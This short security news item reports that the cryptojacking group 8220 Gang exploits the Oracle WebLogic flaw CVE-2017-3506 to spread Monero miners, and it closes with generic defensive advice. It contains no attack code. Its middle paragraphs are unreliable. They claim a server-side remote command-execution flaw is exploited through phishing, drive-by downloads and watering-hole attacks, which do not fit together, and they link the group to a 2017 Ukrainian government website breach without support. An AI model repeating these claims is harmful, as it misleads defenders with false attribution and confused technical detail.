The notorious cryptojacking group 8220 Gang has been spotted weaponizing a six-year-old security flaw in Oracle WebLogic servers to ensnare vulnerable instances into a botnet and distribute cryptocurrency mining malware.
The flaw, CVE-2017-3506, allows an unauthenticated attacker to execute arbitrary commands remotely, giving them access to sensitive data or the entire system.
The group is known to use a variety of techniques to exploit the vulnerability, including phishing emails, drive-by downloads, and watering hole attacks. Once a system is compromised, the group installs a cryptocurrency miner that uses the system’s resources to mine for Monero, a privacy-focused cryptocurrency. The miner can significantly slow down the system and even cause it to crash.
Furthermore, 8220 Gang is a well-organized and sophisticated group that has been active for several years. The group has been linked to a number of high-profile attacks, including the breach of the Ukrainian government’s website in 2017.
Organizations can protect themselves from 8220 Gang and other cryptojacking groups by keeping their systems up to date with the latest security patches, using a firewall to block unauthorized access, and installing antivirus software.
Organizations should also be aware of the signs of a cryptojacking attack, such as a sudden increase in CPU usage or a decrease in system performance.
